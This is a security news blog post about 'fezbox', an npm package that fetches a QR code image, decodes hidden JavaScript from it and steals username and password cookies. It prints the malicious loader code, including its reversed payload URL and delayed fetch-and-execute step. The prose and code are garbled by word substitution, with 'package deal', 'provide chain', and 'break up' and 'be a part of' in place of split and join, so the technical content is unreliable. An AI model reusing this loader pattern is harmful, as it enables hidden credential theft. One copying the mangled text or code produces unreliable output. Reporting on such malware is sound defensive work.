Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code

Posted on September 23, 2025September 24, 2025 By CWS

A complicated malware marketing campaign has emerged within the npm ecosystem, using an progressive steganographic approach to hide malicious code inside QR codes.

The malicious package deal, recognized as “fezbox,” presents itself as a respectable JavaScript/TypeScript utility library whereas secretly executing password-stealing operations via a cleverly disguised QR code payload.

This assault represents a major evolution in provide chain threats, demonstrating how cybercriminals are adopting more and more inventive strategies to bypass safety measures and evade detection programs.

The fezbox package deal masquerades as a complete utility library providing TypeScript assist, efficiency optimization, and modular performance.

Based on its documentation, the package deal offers widespread helper capabilities organized by function modules, permitting builders to import solely mandatory elements.

Whereas the README file mentions a QR Code Module for producing and parsing QR codes, it intentionally omits essential particulars in regards to the package deal’s functionality to fetch QR codes from distant URLs and execute embedded malicious code.

Picture of the QR code (Supply – Socket.dev)

Socket.dev analysts recognized the malware after detecting suspicious behavioral patterns inside the package deal’s codebase.

The safety crew found a number of layers of obfuscation strategies, together with string reversal, code minification, and the novel use of steganographic QR codes to cover the ultimate payload.

On the time of discovery, the malicious package deal remained energetic on the npm registry, prompting Socket.dev to petition the npm safety crew for its quick removing and the suspension of the menace actor’s account.

Superior Steganographic Payload Supply

The malware employs a classy multi-stage execution course of that begins with environmental checks and timing delays to evade sandbox detection.

The preliminary malicious code accommodates browser-specific conditionals that confirm the presence of window and doc objects, making certain execution solely happens in respectable browser environments.

When circumstances are met, the malware waits 120 seconds earlier than initiating the payload retrieval course of.

The core malicious performance revolves round a reversed URL string that conceals the placement of the steganographic QR code:-

(operate () {
if (n.isDevelopment() || c.probability(2 / 3))
return;
setTimeout(async () => {
const loader = new d.QRCodeScriptLoader();
const t = await loader.parseQRCodeFromUrl(
“gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yrani”
.break up(“”)
.reverse()
.be a part of(“”)
);
loader.executeCode(t);
}, 120 * 1e3);
})();

When reversed, this string resolves to a Cloudinary-hosted QR code picture containing the ultimate malicious payload. The QR code itself serves as a steganographic container, hiding JavaScript code that extracts username and password values from browser cookies.

As soon as decoded, the payload makes an attempt to find cookies containing authentication credentials, particularly looking for “username” and “password” fields utilizing further string obfuscation strategies.

The extracted credentials are then exfiltrated via an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

This multi-layered method – combining environmental evasion, timing delays, string reversal, steganographic concealment, and credential extraction – represents a classy evolution in npm-based provide chain assaults that safety groups should put together to defend towards.

Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Browser, Code, Malware, NPM, Package, Passwords, Steals, Steganographic

Post navigation

Previous Post: Jaguar Land Rover Says Shutdown Will Continue Until at Least Oct 1 After Cyberattack
Next Post: Threat Actors Breaking to Enterprise Infrastructure Within 18 Minutes From Initial Access

Related Posts

Windows 11 Gets New AI-Powered Features Cyber Security News
Malicious Bing Ads deploy Weaponized PuTTY to Exploit Kerberos and Attack Active Directory services Cyber Security News
UTG-Q-1000 Group Weaponizing Subsidy Schemes to Exfiltrate Sensitive Data Cyber Security News
Free Decryptor Released for AI-Assisted FunkSec Ransomware Cyber Security News
Threat Actors Exploitation Attempts Spikes as an Early Indicator of New Cyber Vulnerabilities Cyber Security News
What Is Out-of-Bounds Read and Write Vulnerability? Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Threat Actors Breaking to Enterprise Infrastructure Within 18 Minutes From Initial Access
  • New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code
  • Jaguar Land Rover Says Shutdown Will Continue Until at Least Oct 1 After Cyberattack
  • A Massive Telecom Threat Was Stopped Right As World Leaders Gathered at UN Headquarters in New York
  • Beware of Fake Online Speedtest Application With Obfuscated JS Codes

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Threat Actors Breaking to Enterprise Infrastructure Within 18 Minutes From Initial Access
  • New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code
  • Jaguar Land Rover Says Shutdown Will Continue Until at Least Oct 1 After Cyberattack
  • A Massive Telecom Threat Was Stopped Right As World Leaders Gathered at UN Headquarters in New York
  • Beware of Fake Online Speedtest Application With Obfuscated JS Codes

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News